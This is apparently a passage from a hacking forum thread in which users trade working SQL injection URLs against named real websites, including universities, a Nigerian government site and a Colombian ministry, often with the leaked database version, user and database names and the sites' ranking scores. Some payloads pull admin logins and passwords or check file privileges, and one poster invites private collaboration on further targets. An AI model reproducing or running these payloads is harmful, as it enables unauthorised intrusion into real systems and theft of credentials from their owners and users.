SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. MaxFast

    Code:
    http://uni-dance.ru/news.php?id=-86+union+select+1,2,3,concat(version(),0x3a,user())--
    Code:
    4.1.25-log:[email protected]
     
  2. speed21

    Code:
    http://sitetmn.ru/cgi-bin/show.pl?action=view&id=-3+union+select+1,2,3,4,concat_ws(0x3a,database(),version()),6,7,8,9,0,1,2--+f
    Code:
    host1222787_site:5.1.66-log
    My first one :)
     
  3. DezMond™

    PR6
    http://www.geologie.ac.at/index.php?id=225&projectid=-16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
     
  4. unic0rn

    Code:
    http://www.nassnig.org/nass/news.php?id=-584+UNION+SELECT+1,user(),3,version(),database(),6,7,8+--+
    Nigerian National Assembly
    Alexa: 427,927
    PR: 6
     
  5. OxoTnik

    http://www.msh.ru/gallery.php?did=-3+union+select+1,concat_ws(0x3a,login,password)+from+admin
     
  6. DezMond™

    http://www.iaurif.org/index.php?id=615&iaurif_publications_aff%5Betude%5D=-798)+UnIOn/**//**//**//**//**/+/**//**//**//**//**//**//**//**//**//**/SElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60+--+&cHash=7e9e071a42e29c23273d4efd70892d43
     
  7. WallHack

    5.5.32-cll

    Code:
    http://kvadrostyle.ru/page/catalog.php?id=-1633%27+union+select+1,2,@@version,4,5,6,7,8,9,10+--+
    Yandex TIC 250
     
  8. unic0rn

    Code:
    http://www.mbc.edu/baldwin-job-board/detail.php?id=1000+AND+1=0+UNION+SELECT+1,2,3,user%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
    PR:5

    Code:
    http://proyectos.diariosur.es/cronica-universitaria/descargar.php?id=-21+UNION+SELECT+1,2,user(),4,5,6,7+--+
    MQ: On
    FP: Y
    Alexa: 9,866
    PR: 7

    Code:
    http://apps.jifsan.umd.edu/portal/courses_pages.php?cid=-18%27+union+select+1,2,user(),database(),5,6,7,8,9,10+--+
    Alexa: 8,772
    PR: 6

    Code:
    http://www.atlantic.edu/about/news/article.php?article=-991+union+select+1,user(),3,4,5,6,7,8,9,10,11,12
    PR: 6
     
  9. WallHack

    Output appears where the products are listed

    Code:
    http://faunamarket.com/catalog.php?id=1%27+union+select+1,@@version+--+
    5.1.73-cll

    Yandex TIC 50 PR 1/10

    There is a forum on phpBB3
     
  10. MaxFast

    Code:
    http://55let.rudn.ru/news.php?id=-35+union+select+1,2,concat(user(),0x3a,version()),4,5,6,7,8,9--
    root@localhost:5.6.11

    55 years old, and they still write hole-ridden engines.
     
  11. GhostW

    Code:
    http://www.tennis-piter.ru/pagerub.php?rub=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4--
    Code:
    5.1.63-0+squeeze1-log:[email protected]:z75741_portal
     
  12. unic0rn

    Code:
    http://www.businessownersideacafe.com/small_business_grants/winner.php?grant_id=-1+UNION+SELECT+user()+--+
    PR: 6

    Nothing interesting. I included the SQL injection so the message would not count as flood.

    Gentlemen, I need advice on SQL injections, includes and so on.
    Joint digging into juicy links that I would rather not post in public. If anyone is interested, PM me, please.
     
  13. kingbeef

    Code:
    http://game.vietgiaitri.com/vui-nhon-12.vgt+and+(ExtractValue(1,concat(0x3a,user(),0x3a,version(),0x3a,database())))
    Code:
    [email protected]:5.6.19:vietgia
     
  14. GhostW

    Code:
    http://www.unatech.org/pagerub.php?cat_id=-21+union+select+1,2,3,4,5,6,@@version,8,9--
    Code:
     5.1.56 
     
  15. DezMond™

    PR8
    http://pendientedemigracion.ucm.es/info/revesco/EdicionElectronica.php?IdRevista=-33+UnIoN/**//**//**//**//**/+/**//**//**//**//**//**//**//**//**//**//**//**//**//**//**/sELEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84+from+TRUsuarios+--+
     
  16. look2009

    http://www.minambiente.gov.co/index.php?option=com_spidercalendar&calendar_id=1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
     
  17. ninja96c

    output in the error
     
    #15837 ninja96c, 11 Sep 2014
    Last edited: 11 Sep 2014
  18. kingbeef

    Code:
    http://mail.aaa.com.ua/news/18838.html'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
    5.5.38-0ubuntu0.12.04.1
    Output in the alert.
     
  19. DezMond™

    http://archiv.jura.uni-saarland.de/entschdb/lagsaarland/dboutput.php?id=-42'+union+select+user(),2+--+
     
  20. hpol

    Code:
    http://teleskop.ru/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,File_Priv,4,5,6,7,8,9,10+from+mysql.user--&Itemid=3227
    
    mysql 5.0.45
    file priv y
    TIC 140 PR 3
     